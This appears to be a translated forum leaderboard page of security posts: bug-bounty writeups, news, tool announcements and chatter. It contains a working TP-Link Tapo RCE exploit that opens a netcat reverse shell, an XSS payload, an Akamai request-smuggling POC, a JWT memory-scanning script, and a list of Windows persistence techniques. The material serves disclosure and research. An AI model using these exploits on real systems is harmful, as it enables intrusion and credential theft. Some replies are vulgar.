Leaderboard

Popular Content

Showing content with the highest reputation since 09/07/22 in all areas

  1. Hi. I found two XSS vulnerabilities in applications owned by Microsoft. One is in Outlook, and the second is in another application that many people use and know... I can't give details for now because neither has been fixed yet... At least, I haven't received a duplicate on the reports I sent. 🙂 1. Reflected XSS (without user interaction) - [*].live.com: 2. Reflected XSS (user interaction required) - Outlook: I noticed that these domains are also vulnerable: office365.com and live.com.
    10 points
  2. I thought it was a Bitdefender ad 🤣 so the conclusion is that everything bad that happens in this world comes from the Russians. Damn, nobody says anything about the disgusting Americans. All of Europe has become a colony licking American ass.
    6 points
  3. The vulnerability in [*].live.com. I got a message today. I wasn't expecting a reply so fast. 🙂 Later edit: They've also fixed it... LOL. I just checked 😅
    5 points
  4. This guy's a dumbass who doesn't go down on his woman. That's why she goes after others, man 🤣
    5 points
  5. :))))))))))))))) You broke Google! Romanian, Windows in Spanish (look, it says BUSCAR), an IP from NL and it places you in the UK. On some servers the GeoIP libraries aren't updated. IP addresses can be assigned to whatever country the providers (their owners) want.
    4 points
  6. https://adevarul.ro/stiri-interne/evenimente/inchisoare-pe-viata-pentru-luptatorul-k1-care-a-2209265.html?
    4 points
  7. Hi, I'm the guy from the Republic of Moldova and I'll answer a few of the questions you had at the time. 1. I wasn't the illiterate one (I'm from Brasov but I live in Moldova). 2. I had no intention of taking money etc.; we were just dumb kids who had nothing to do with their time, and I paid enough for it. 3. I never agreed with the message, but one of the guys insisted on the subject; you can see that he is also the one who wrote everything on the deface. 4. I got caught because one of the guys (the one who wrote the defaces) was always talking in public and bragging about the things we did; the police got to me through him because he had my phone number (my mistake). So yes, at least I was a dumb kid with nothing to do, with no bad intentions (or so I thought). I hope I've cleared things up in case anyone was STILL curious about what happened. Stay legal!
    4 points
  8. They are the winners of the last edition of the DefCamp Capture the Flag (D-CTF) competition. Wondering how your name could get on the D-CTF 2022 leaderboard (win prizes totaling EUR 4,500 & get free tickets to DefCamp 2022)? Just follow these 3 easy steps:
1. Get your team together & register for the D-CTF 2022 Qualifications - not to put any pressure on, but there is only one week left! 😱
WHEN? Starting September 30th, 09.00 UTC, until October 1st, 15.00 UTC
WHERE? Online, on CyberEDU.ro
Register: https://dctf22-quals.cyberedu.ro/
2. Hack before getting hacked & make it into the top 10 shortlist that will be attending the finals during the DefCamp conference in Bucharest. P.S. Up to 5 teams from Romania will also be invited to the final.
3. Join us at DefCamp on November 10-11 in Bucharest & do your absolute best in the D-CTF 2022 finals!
Register: https://dctf22-quals.cyberedu.ro/
See you soon! The DefCamp team
    4 points
  9. You didn't understand the question. Let me translate: At his school, in the computer lab, how can he find out which sites the other students/teachers are looking at? Hack the local network so he knows what the other users access (passwords, sites, messages, everything, everything). Is that it? Did I get it right?
    3 points
  10. A lot of people have asked me this question; the thing is that I didn't even know about the hospitals, I only found out after I got to DIICOT (I had already withdrawn from that group about 2 months earlier for lack of time). Later I also saw the evidence, and indeed the guys who were still there were planning to block the hospitals' IT systems for reasons I can't explain; there are many things and decisions they made in my absence that I didn't understand, and this would be one of them. After I was caught in Moldova, I went to the Prosecutor's Office for Combating Organized Crime and Special Cases in Chisinau, I stayed there for a while, and some months later I went to DIICOT in Bucharest; it was a long procedure, full of stress and bad feelings, which lasted about a year. In the end I managed to get away with some community service, for the only reason (I think) that the DIICOT prosecutors were decent with me and because I was a minor (I had one month left until I turned 18). A bad experience at the time, but an extremely good one for the present and the times to come; I gained a lot of work opportunities and managed to completely change my mindset about 'destruction' and doing illegal things: you can do them if you're passionate, but everything can be legal, without any risk that could ruin your future. A very important lesson for me, which I learned 'the hard way' 😁.
    3 points
  11. GTA 6 source code and videos leaked after Rockstar Games hack
By Lawrence Abrams, September 18, 2022

Grand Theft Auto 6 gameplay videos and source code have been leaked after a hacker allegedly breached Rockstar Games' Slack server and Confluence wiki.

The videos and source code were first leaked on GTAForums yesterday, where a threat actor named 'teapotuberhacker' shared a link to a RAR archive containing 90 stolen videos.

The videos appear to have been created by developers debugging various features in the game, such as camera angles, NPC tracking, and locations in Vice City. In addition, some of the videos contain voiced conversations between the protagonist and other NPCs.

[Image: RAR archive containing the 90 leaked GTA 6 videos]

The hacker claims to have stolen "GTA 5 and 6 source code and assets, GTA 6 testing build," but is trying to extort Rockstar Games to prevent further data from being released. However, the threat actor says they are accepting offers over $10,000 for the GTA V source code and assets but are not selling the GTA 6 source code at this time.

[Image: Selling GTA V source code on Telegram. Source: BleepingComputer]

After forum members showed disbelief that the hack was real, the threat actor claimed he was behind the recent cyberattack on Uber and leaked screenshots of source code from both Grand Theft Auto V and Grand Theft Auto 6 as further proof.

Rockstar Games has not released a statement or responded to our email about the attack at this time. However, Bloomberg's Jason Schreier confirmed the leak was valid after speaking to sources at Rockstar.

The leaked videos have since made it onto YouTube and Twitter, with Rockstar Games issuing DMCA infringement notices and takedown requests to get the videos offline.

[Image: Leaked GTA 6 video taken down on YouTube. Source: BleepingComputer]

"This video is no longer available due to a copyright claim by Take 2 Interactive," reads a copyright claim by Take 2 Interactive, the owner of Rockstar Games.

These takedown demands lend further validity to the fact that the leaked GTA 6 videos are real. However, Rockstar Games' efforts come too late, as the threat actor and others had already started leaking the stolen GTA 6 videos and portions of the source code on Telegram.

For example, the threat actor leaked a GTA 6 source code file today that is 9,500 lines long and appears to be related to executing scripts for various in-game actions.

Claims to be behind Uber attack

The hacker hasn't shared details on how they gained access to the GTA 6 videos and source code other than claiming to have stolen them from Rockstar's Slack and Confluence servers.

The threat actor also claims to be the same hacker, named 'TeaPots,' behind the recent Uber cyberattack, but BleepingComputer could not confirm whether these claims are valid.

However, during the cyberattack on Uber, the threat actor also gained access to the company's Slack server and other internal services after performing a social engineering attack on an employee.

While there are not enough details about the Rockstar Games hack, the types of servers accessed and the very public announcements are similar to the Uber hacker's tactics.

Source: https://www.bleepingcomputer.com/news/security/gta-6-source-code-and-videos-leaked-after-rockstar-games-hack/
    3 points
  12. At that age, it's better not to know! Relax!
    3 points
  13. I was listening to this and around minutes 3-8 the guy talks about Romania having been the leading nation in the program for implementing cybersecurity for Ukraine? Anyway, great podcast.
    2 points
  14. Nice, congrats! BTW (out of scope): https://api.partnercenter.microsoft.com/insights/v1/mpn/swagger/index.html?configUrl=https://pentesting.syzhack.com/swg/test.json
    2 points
  15. TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)

```
# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
# Date: 02/11/2022
# Exploit Author: hacefresko
# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
# Version: 1.1.15 and below
# Tested on: 1.1.11, 1.1.14 and 1.1.15
# CVE : CVE-2021-4045
# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce

import requests, urllib3, sys, threading, os

# The camera serves HTTPS with a self-signed certificate; silence the warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

PORT = 1337
# Classic named-pipe reverse shell; %s/%d are filled with the attacker IP and port.
REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
NC_COMMAND = 'nc -lv %d' % PORT  # nc command to receive reverse shell (change it depending on your nc version)

if len(sys.argv) < 3:
    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
    exit()

victim = sys.argv[1]
attacker = sys.argv[2]

# Start the listener in the background before the payload is delivered.
print("[+] Listening on %d" % PORT)
t = threading.Thread(target=os.system, args=(NC_COMMAND,))
t.start()

# The unauthenticated setLanguage method passes "payload" to a shell unsanitised;
# closing the quote and appending ';<cmd>;' injects the reverse shell.
print("[+] Serving payload to %s\n" % victim)
url = "https://" + victim + ":443/"
json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
requests.post(url, json=json, verify=False)
```

Source
    2 points
  16. Escalating SSTI to Reflected XSS using curly braces {}

Hello everyone! My name is Sagar Sajeev and this is my writeup explaining how I was able to escalate a Server Side Template Injection (P4) to a much more severe XSS.

Note: For those who haven't heard of Server Side Template Injection or SSTI, I recommend you get some understanding of SSTI before reading this writeup. I've made a specific writeup explaining SSTI. You can check it out by clicking here. Basically, it's a way to inject something (a payload) into the template engine, which in turn gets executed on the server side.

Target Scenario

After hours of hard work trying to find an endpoint vulnerable to XSS, I finally came to one which seemed interesting to me. It was exposing a sign-up page. What was interesting about it was that it was kept hidden. The URL looked something like:

https://www.redacted.com/engine/signup/create.php

I tried XSS payloads there, but it was filtering everything. It was then that I thought of adding curly braces {} to the first name, last name and address fields. To my surprise, none of the three fields carried out any specific filtering for curly braces. I tried the following payload:

{{ &lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }}

I know the payload looks complicated. It's just that all entities are URL-encoded. This is how the decoded payload looks:

{{ <svg/onload=prompt("XSS")> }}

The thing is that the direct payload was not going through for some reason. I had to intercept the request using Burp and then add the encoded payload. XSS was fired. Well, the thing is that this is just self-XSS.

Self XSS to Stored XSS

The target website had a section where you could create projects. Think of a project as a folder where you can store files. The project admin can share this with other "authenticated users". The project must be given a name and is shared using a link. Well, I named the project with the payload. Thus, the file name is now:

{{ &lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }}

Insane bruh moment. No file name restrictions were in place and I could name the project however I wanted. I copied the share project link and sent it to other authenticated users. As I mentioned before, only authenticated users can view the project, so the application forces the user to log in before being able to see the shared project. When an authenticated user clicks on the link, voilà, here it is! The XSS pop-up.

Quick Recap

An SSTI-based self-XSS payload was created. Self-XSS was escalated to reflected XSS (differs according to attack scenario). SSTI → Self XSS → Reflected XSS

This, in fact, could be escalated to higher severity. The attacker could just create a project and share its link on social media. If, by chance, an authenticated user randomly clicks on the link, XSS could be triggered.

My SSTI writeup can be found here: https://sagarsajeev.medium.com/server-side-template-injection-something-distinct-f0ac234e379

Tips:
Make sure you spend time understanding the target. I spent nearly a week on this target to find this. Don't keep changing from one program to another just because you aren't able to find a specific bug. Make a list of vulnerabilities you have learned and test each of them accordingly. Also, make sure to explain the impact at the highest severity. Let them know the greatest potential impact the vulnerability could have. I recommend you make notes, whether handwritten or in Notion. Make sure that you take notes. It will help in the long run.

Timeline
Submitted: 18-09-2022
Accepted: 19-09-2022
Rewarded with Amazon gift card: 22-09-2022

I do occasionally share some tips about bug bounties and related stuff over at my Twitter and LinkedIn handles, so do follow me there. If you've got any queries, feel free to message me. I will be more than happy to help.

LinkedIn: https://www.linkedin.com/in/sagar-sajeev/
Twitter: https://twitter.com/Sagar__Sajeev

Thanks for going through my writeup and I hope it was useful to you. I've made many other writeups on my Medium handle. Please do check those out as well. Happy Hunting!

Source: https://sagarsajeev.medium.com/escalating-ssti-to-reflected-xss-using-curly-braces-825685bd93ec
    2 points
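The writeup above shows the symptom (curly braces survive the XSS filter and the payload lands in the page unescaped) but not the underlying mechanism. The following is an added example written for this page, not the author's code or the target's template engine: a toy engine that evaluates whatever sits inside `{{ }}`, a "project name" handler that concatenates the user's input into the template source (the SSTI bug), and the hardened handler that passes the same input as escaped context data. The engine, the `render_project_*` names and the `<h1>` markup are assumptions made for the illustration.

```python
import html
import re

# Toy template engine written for this example. It is NOT the engine behind the
# writeup's target; it reproduces the one property that matters for SSTI:
# whatever sits between {{ and }} is evaluated as code on the server.
_EXPR = re.compile(r"\{\{(.*?)\}\}", re.DOTALL)


def render_template(source: str, context: dict) -> str:
    """Replace every {{ expr }} in source with the result of evaluating expr."""
    def replace(match):
        expr = match.group(1).strip()
        try:
            return str(eval(expr, {"__builtins__": {}}, dict(context)))
        except Exception:
            # Like some real engines, fall back to emitting the raw text of an
            # expression that does not parse. Nothing escapes it on the way out.
            return expr
    return _EXPR.sub(replace, source)


def render_project_vulnerable(project_name: str) -> str:
    """The bug: the attacker-controlled project name is concatenated into the
    template SOURCE, so the engine treats it as template code."""
    source = "<h1>Project: " + project_name + "</h1>"
    return render_template(source, {})


def render_project_hardened(project_name: str) -> str:
    """The fix: the template text is a constant; the name travels as DATA in the
    context and is HTML-escaped before the engine splices it into the page."""
    source = "<h1>Project: {{ name }}</h1>"
    return render_template(source, {"name": html.escape(project_name, quote=True)})


if __name__ == "__main__":
    for name in ["{{ 7*7 }}", '{{ <svg/onload=prompt("XSS")> }}']:
        print("vulnerable:", render_project_vulnerable(name))
        print("hardened:  ", render_project_hardened(name))
```

The `{{ 7*7 }}` probe is the standard first check for SSTI: if "49" comes back, user input is being compiled as template code, and any HTML the engine cannot parse (the `<svg>` payload) is echoed raw, which is the self-XSS the writeup turned into a shared-link XSS. In the hardened version the same strings render literally and escaped.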
  17. The repository tries to gather information about Windows persistence mechanisms to make protection/detection more efficient. Most of the information has been well known for years, being actively used in various scenarios. Expect more. I am doing my best to add new entries each day.

How it works. And how to contribute.

👨‍💼 HKCU Run and RunOnce registry keys
👨‍💼 ⚙ Task Scheduler
⚙ Image File Execution Options key
⚙ Windows Services
AeDebug
WER Debugger *
⚙ Natural Language Development Platform 6 DLLs *
⚙ GPO Client-side Extension
⚙ Filter Handlers for Windows Search
Disk Cleanup Handler
👨‍💼 .chm helper DLL *
hhctrl.ocx *
⚙ AMSI Providers
⚙ ServerLevelPluginDll
Password Filter
Credential Manager DLL
⚙ Authentication Packages
Code Signing DLL
👨‍💼 HKCU cmd.exe AutoRun
⚙ LSA Extension
⚙ Winlogon Notification Package
⚙ Print Monitor
👨‍💼 HKCU Load
MPNotify
⚙ Windows Platform Binary Table
Explorer tools *
👨‍💼 Windows Terminal Profile
👨‍💼 Startup Folder
👨‍💼 User Init Mpr Logon Script *
⚙ Autodial DLL *
.NET Startup Hooks
👨‍💼 PowerShell Profiles
👨‍💼 TS Initial Program

Want more? Check the list tomorrow.

* Based on research by @Hexacorn - one of the best persistence hunters.
⚙ It is enough to turn the computer on to make the code run.
👨‍💼 An end user can do it.

Source: https://persistence-info.github.io/
    2 points
  18. Hi, I don't know if you're serious or not, but what you're asking for is a security matter. Without a bug/vulnerability in YouTube I don't think you have any chance of accessing a private video (that's why it's private). And if that were the case, someone would surely ask a pretty considerable sum for such a service, if not even charge per video. Good luck, and if you find one, let us know too.
    2 points
  19. Maybe they'll invent a feature so that when someone calls you on the home phone, it redirects the call to another number....
    2 points
  20. @iulikastea, the ones from the site with psychologists look like the ones from sentimente.ro in 2008. I think Raveno's nick appears on www.crestinortodox.ro. I'm not a practicing Christian, but at the census I declared myself Orthodox. I hope you didn't find her on the forum there. Good luck. Now, seriously, a friendly piece of advice. If she isn't cheating on you and you keep suspecting her, it means you're jealous, and if it gets confirmed that she cheated on you, then you really won't be able to live with the thought. A while back there was someone saying he deletes messages; you can search older topics on the same subject. I know @Chese was struggling to build an Android RAT written in C#, but only for educational purposes. The best thing would be to face life head on and confront her directly. Let's suppose, hypothetically, that you installed the software on the phone and your suspicions were confirmed. Would you have the courage to confront her and present her with the evidence?
    2 points
  21. I even did a password recovery just to reply 🤣 yes, it's possible: 1 to 6 months, or a fine starting at 6,000 lei.
    2 points
  22. What a shame the haha react was removed. No point replying to the guy, 99% he won't come back to the forum; he probably searched "how to hack my wife simple tutorial in Romanian" and RST came up.
    2 points
  23. Give me $20 and I'll tell you for sure that she's cheating on you. And watch out, what you want is a criminal offense; lots of idiots are in jail for illegal access to accounts.
    2 points
  24. Get yourself an older one (79 years old) so you don't care what she does, and then you get an inheritance as a bonus too.
    2 points
  25. Parental Control, put it in airplane mode, basically you're buying her some makeup.
    2 points
  26. Surely you've been expecting our email about the DefCamp conference, right? We are happy to officially announce that we're back with DefCamp - the offline edition, this fall, as we've become accustomed to over the last 10 years. Registrations are NOW OPEN, which means you can book your early bird ticket right now! Ready, steady, gooooo pack your bags and cyber knowledge for #DefCamp12! https://def.camp/tickets/
WHEN: 10th-11th November, 2022
WHERE: Bucharest, Romania
Call for papers: https://def.camp/call-for-papers/
Call for contests: https://def.camp/call-for-contests/
Become a volunteer: https://def.camp/become-a-volunteer/
Website: https://def.camp/
    1 point
  27. Tracee is a runtime security and forensics tool for Linux. It uses Linux eBPF technology to trace your system and applications at runtime, and analyzes the collected events in order to detect suspicious behavioral patterns. It is usually delivered as a Docker container, but there are other ways you can use it (you can even create your own customized Tracee container).

Watch a quick video demo of Tracee. Check out the Tracee video hub for more videos.

Documentation

The full documentation of Tracee is available at https://aquasecurity.github.io/tracee/dev. You can use the version selector on top to view documentation for a specific version of Tracee.

Quickstart

Before you proceed, make sure you follow the minimum requirements for running Tracee.

1. Running tracee:latest

```
docker run \
  --name tracee --rm -it \
  --pid=host --cgroupns=host --privileged \
  -v /etc/os-release:/etc/os-release-host:ro \
  -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
  aquasec/tracee:latest
```

2. Running tracee:full

```
docker run --name tracee --rm -it \
  --pid=host --cgroupns=host --privileged \
  -v /etc/os-release:/etc/os-release-host:ro \
  -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
  -v /usr/src:/usr/src:ro \
  -v /lib/modules:/lib/modules:ro \
  -v /tmp/tracee:/tmp/tracee:rw \
  aquasec/tracee:full
```

The default (latest) image is lightweight and portable. It is supposed to support different kernel versions without having to build source code. If the host kernel does not support BTF then you may use the full container image. The full container will compile an eBPF object during startup if you do not have one already cached in /tmp/tracee. You may need to change the volume mounts for the kernel headers based on your setup. See the Linux Headers section for more info.

Tracee supports enriching events with additional data from running containers. In order to enable this capability please look here.

These docker commands run Tracee with default settings and start reporting detections to standard output. In order to simulate suspicious behavior, you can simply run strace ls in another terminal. This will trigger the Anti-Debugging signature, which is loaded by default, and you will get a warning:

```
INFO: probing tracee-ebpf capabilities...
INFO: starting tracee-ebpf...
INFO: starting tracee-rules...
Loaded 14 signature(s): [TRC-1 TRC-13 TRC-2 TRC-14 TRC-3 TRC-11 TRC-9 TRC-4 TRC-5 TRC-12 TRC-8 TRC-6 TRC-10 TRC-7]
Serving metrics endpoint at :3366
Serving metrics endpoint at :4466

*** Detection ***
Time: 2022-03-25T08:04:22Z
Signature ID: TRC-2
Signature: Anti-Debugging
Data: map[]
Command: strace
Hostname: ubuntu-impish
```

Trace

In some cases, you might want to leverage Tracee's eBPF event collection capabilities directly, without involving the detection engine. This might be useful for debugging, troubleshooting, analysing, researching or education. Execute the Docker container with the word trace as the initial argument, and tracee-ebpf will be executed instead of the full Tracee detection engine.

```
docker run \
  --name tracee --rm -it \
  --pid=host --cgroupns=host --privileged \
  -v /etc/os-release:/etc/os-release-host:ro \
  -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
  aquasec/tracee:latest \
  trace
```

Components

Tracee is composed of the following sub-projects, which are hosted in the aquasecurity/tracee repository:
Tracee-eBPF - Linux Tracing and Forensics using eBPF
Tracee-Rules - Runtime Security Detection Engine

Tracee is an Aqua Security open source project. Learn about our open source work and portfolio here. Join the community, and talk to us about any matter in GitHub Discussions or Slack.

Download: tracee-main.zip or git clone https://github.com/aquasecurity/tracee.git
Source
    1 point
  28. https://community.tp-link.com/en/smart-home/forum/topic/542494
    1 point
  29. How an Akamai misconfiguration earned us USD 46.000
FRANCESCO MARIANI, SEPTEMBER 17, 2022

A few months ago my friend Jacopo Tediosi and I made an interesting discovery about an Akamai misconfiguration that allowed us to earn more than 46,000 dollars. Our research highlighted how manipulating a particular HTTP header made it possible to change the way proxies communicated with each other, and how this allowed us to perform different request smuggling attacks or, in particular cases, to poison the cache with arbitrary content chosen by us.

In this post we will go directly into detail without explaining how these vulnerabilities work in general, hoping that the reader knows what we are talking about. If not, there are many resources online and even labs to practice with.

Now the question is: how were we able to reveal the misconfiguration? And how was it actually handled by major bug bounty platforms and private companies?

Even today you can encounter this header in the response on several servers under the Akamai network. Probably many of you have already understood, or had already tried, to force the use of Content-Length instead of Transfer-Encoding. But let's go one step at a time.

Once we noticed this particular thing, any attempt to abuse the Connection header with Content-Length as a value to perform a request smuggling attack didn't work. One curious thing we noticed was some unusual responses being provided by Akamai, such as [no URL]. Or, with www.example.com: if we used the same host, the server actually provided different responses, but as many will know it is difficult to determine whether it was actually request smuggling, HTTP pipelining, or normal server behavior from setting the Connection header to keep-alive.

Trying to redirect the requests with my co-worker, we actually found that it worked. But at that point we only had a potential denial of service, which is often rejected for lack of impact.

Once this was done, we did some tests from a different network to verify that it was an open desync. Only later did we discover that by inserting other hosts within the Akamai network we were completely able to redirect each other, and finally we had a complete request smuggling.

This sounded good, but we had a problem. We didn't have a host within the Akamai network. How can you prove that through the attack you can arbitrarily redirect users if you don't have any logs to show?

As we continued to try, and luckily for us, we were able to abuse this bug to arbitrarily cache content from other hosts. We also found that, in addition to the GET method, we could use the OPTIONS method to perform the desired attack; moreover, there was a higher chance that Akamai would not notice that the request was actually malicious.

To poison the cache, it was necessary to send a first GET or OPTIONS request to a nonexistent path (also to avoid damage to the platform), preferably with a static resource extension (more likely to be served from the cache), with the second request going to an arbitrary host. After a couple of requests, the content of the second host's file was correctly cached due to its revalidation, like this:

From then on it was possible to visit the URL /it/it/medusa.txt, which returned the robots.txt of the second host. Obviously, the content we decided to cache was not malicious, but we could cache many types of files such as HTML or JS. Finally, we had a nice impact for the report.

POC:

```
OPTIONS /random.txt HTTP/1.1
Host: ORIGINAL-HOST
Connection: Content-Length
Content-Length: 42

GET /robots.txt HTTP/1.1
Host: ARBITRARY-AKAMAI-HOST
x: 1

```

By sending the request twice it was possible to cache the contents of robots.txt of the second host.

As soon as the discovery was made, we started responsible disclosure, reporting the vulnerability to Akamai. We did not receive immediate confirmation from them. While we waited, we realized that not all Akamai hosts were vulnerable, or that some did not allow arbitrary content caching (they probably had no cache, or particular cache key settings that did not allow the attack). We thought maybe it was some general misconfiguration and decided to report it on bug bounty platforms as well.

Vulnerability management by bug bounty platforms:

Our sincere admiration for the triagers of the HackerOne platform. After a very short time, they were able to replicate and understand the vulnerability, assigning the right severity.

Unfortunately, in Bugcrowd many of the triagers were unable to replicate the vulnerability despite our providing a one-liner with curl, a video POC, screenshots, and more. Some just didn't put the two blank lines in the GET requests, others had the wrong Burp targets, and we also received duplicates (?), like: We were very disappointed with the Bugcrowd triagers.

Microsoft: Microsoft replied very late, saying it was unable to replicate the vulnerability (Akamai had already introduced the security fix).

Apple: Apple responded late, and was unable to replicate the vulnerability due to Akamai's fix. They were very kind and we received thanks by email, but no bounty was paid (we didn't want any).

Intigriti: We only filed a bug; the triager was very nice and friendly, but he gave us a duplicate.

THE FIX: Akamai took very little time to ship the security fix after our report; now any attempt to use the Connection header in an inappropriate way is automatically blocked. Akamai has given us permission to make a public disclosure.

Source: https://blog.hacktivesecurity.com/index.php/2022/09/17/http/
    1 point
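An added illustration of the POC above, written for this page rather than taken from the post or from Hacktive Security's tooling. It builds the two-request payload with Content-Length computed from the embedded request (the post's POC hardcodes 42, which has to equal the byte length of the embedded GET for the given host, so compute it), shows that a hop honouring Content-Length sees a single OPTIONS whose body merely happens to look like a GET, and then models one plausible way a misbehaving hop could desync: treating the header named in Connection as hop-by-hop and stripping it, which leaves the body bytes on the wire with nothing saying they are a body. The post does not state which hop did what, so that stripping model, the hostnames and the function names are assumptions.

```python
from __future__ import annotations

from dataclasses import dataclass

CRLF = "\r\n"


@dataclass
class ParsedRequest:
    request_line: str
    headers: dict
    body: bytes


def build_smuggling_poc(original_host: str, target_host: str, path: str = "/random.txt") -> bytes:
    """Assemble the post's two-request payload: an OPTIONS to a nonexistent static path on
    the original host whose body is a complete GET for another host. Content-Length is
    computed from the embedded request rather than hardcoded, so it always covers it exactly."""
    inner = (
        f"GET /robots.txt HTTP/1.1{CRLF}"
        f"Host: {target_host}{CRLF}"
        f"x: 1{CRLF}{CRLF}"
    ).encode()
    outer = (
        f"OPTIONS {path} HTTP/1.1{CRLF}"
        f"Host: {original_host}{CRLF}"
        f"Connection: Content-Length{CRLF}"
        f"Content-Length: {len(inner)}{CRLF}{CRLF}"
    ).encode()
    return outer + inner


def parse_one_request(raw: bytes) -> tuple[ParsedRequest, bytes]:
    """Parse one message the way a hop that honours Content-Length does: headers, then
    exactly Content-Length body bytes. Returns the message and the unconsumed remainder."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.decode("latin-1").split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    return ParsedRequest(lines[0], headers, rest[:length]), rest[length:]


def requests_seen(raw: bytes) -> list[str]:
    """Request lines a Content-Length-honouring hop would carve out of a byte stream."""
    seen = []
    while raw.strip():
        try:
            request, raw = parse_one_request(raw)
        except ValueError:
            break
        seen.append(request.request_line)
    return seen


def forward_like_a_hop_by_hop_proxy(raw: bytes) -> bytes:
    """ASSUMED model of a misbehaving hop (the post does not say which hop did this):
    apply RFC 7230 hop-by-hop semantics literally and remove every header named in
    Connection, plus Connection itself, before forwarding. Naming Content-Length there
    strips the body length while the body bytes stay on the wire for the next hop."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split(CRLF)
    drop = {"connection"}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "connection":
            drop |= {token.strip().lower() for token in value.split(",")}
    kept = [lines[0]] + [h for h in lines[1:] if h.partition(":")[0].strip().lower() not in drop]
    return (CRLF.join(kept) + CRLF + CRLF).encode() + rest


if __name__ == "__main__":
    # Hostnames are placeholders, not hosts that were tested.
    poc = build_smuggling_poc("www.example.com", "cdn.example.net")
    print("front hop sees:", requests_seen(poc))
    print("next hop sees: ", requests_seen(forward_like_a_hop_by_hop_proxy(poc)))
```

The second print is the desync: after the stripping hop, the GET for the other host is parsed as its own request on the same connection, which is what made the cache-poisoning step possible. When reproducing this kind of report, note the two blank lines the post mentions; drop one and the embedded GET is no longer a complete message.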
  30. AzTokenFinder is a small tool to extract JWTs (or JWT-like-looking data) from different processes, like PowerShell, Excel, Word or others. The idea came from another tool which I read about on Twitter, but I could not find it anymore. Maybe someone could give me a hint.

```
AzTokenFinder.exe --help

  --processname        Names of processes you want to parse. Please omit the ".exe".
  --processids         Process IDs you want to parse.
  --default            Enumerate Edge, Excel, Word, PowerShell, Teams, OneDrive and PowerPoint.
  --showexpiredtokes   (Default: false) Shows expired tokens.
  --help               Display this help screen.
  --version            Display version information.
```

How does it work

There is nothing special in it. It simply opens the processes you provide and searches through the memory for JWT-like-looking data and extracts it.

Note

It currently only works with x64 processes and it does not extract refresh tokens currently. Maybe I'll change this later.

Source: https://github.com/HackmichNet/AzTokenFinder
    1 point
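The README says the tool "searches through the memory for JWT like looking data". As an added example (written for this page, not AzTokenFinder's code, which is C#), here is the search step over a byte buffer standing in for a process memory dump: find three-segment base64url strings, decode header and payload, and drop expired tokens unless asked to show them, which mirrors the tool's default. The sample buffer and the tokens in it are constructed here (filler signature, fictitious UPNs); the audience value is only an illustration of what Azure tokens carry.

```python
from __future__ import annotations

import base64
import json
import re
import time

# Three base64url segments joined by dots. A base64url-encoded JSON object begins
# with "eyJ" (the encoding of '{"'), which pins the header and payload segments.
_JWT_RE = re.compile(rb"eyJ[A-Za-z0-9_-]{4,}\.eyJ[A-Za-z0-9_-]{4,}\.[A-Za-z0-9_-]{8,}")


def _b64url_decode(segment: bytes) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + b"=" * (-len(segment) % 4))


def find_jwts(buffer: bytes, now: float | None = None, show_expired: bool = False) -> list[dict]:
    """Scan a raw memory-like byte buffer for JWTs and return the decoded claims of each.
    Expired tokens are dropped unless show_expired is set, mirroring the tool's default."""
    now = time.time() if now is None else now
    hits = []
    for match in _JWT_RE.finditer(buffer):
        token = match.group(0)
        head, body, _sig = token.split(b".")
        try:
            header = json.loads(_b64url_decode(head))
            claims = json.loads(_b64url_decode(body))
        except ValueError:
            continue  # base64url-looking noise that is not a JWT
        if not isinstance(header, dict) or not isinstance(claims, dict):
            continue
        exp = claims.get("exp")
        expired = isinstance(exp, (int, float)) and exp < now
        if expired and not show_expired:
            continue
        hits.append({
            "offset": match.start(),
            "alg": header.get("alg"),
            "aud": claims.get("aud"),
            "upn": claims.get("upn"),
            "exp": exp,
            "expired": expired,
            "token": token.decode("ascii"),
        })
    return hits


def make_sample_jwt(claims: dict) -> str:
    """Build a constructed token for the sample buffer. The signature is filler bytes:
    this is for scanning, not for verifying, and the scanner never checks it."""
    def enc(obj: dict) -> str:
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")
    return f"{enc({'alg': 'RS256', 'typ': 'JWT'})}.{enc(claims)}.{'A' * 43}"


def sample_buffer() -> bytes:
    """Constructed stand-in for a process memory dump: two tokens among binary noise
    and one base64url-looking string that is not a JWT."""
    live = make_sample_jwt({"aud": "https://graph.microsoft.com", "upn": "alice@contoso.example", "exp": 2000000000})
    stale = make_sample_jwt({"aud": "https://graph.microsoft.com", "upn": "bob@contoso.example", "exp": 1600000000})
    return (b"MZ\x90\x00" + b"eyJabcd.eyJefgh.ijklmnopqr" + b"\x00\x01"
            + live.encode() + b"\x00" * 16 + stale.encode() + b"\xff\xfe")


if __name__ == "__main__":
    for hit in find_jwts(sample_buffer(), show_expired=True):
        print(hit["offset"], hit["upn"], hit["aud"], "expired" if hit["expired"] else "live")
```

Two practical notes: the regex is deliberately loose, so the JSON decode is what separates real tokens from lookalike noise; and nothing here validates the signature, because the point of memory scanning is harvesting, not verification, which is also why the tool's output should be treated as credentials and handled accordingly.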
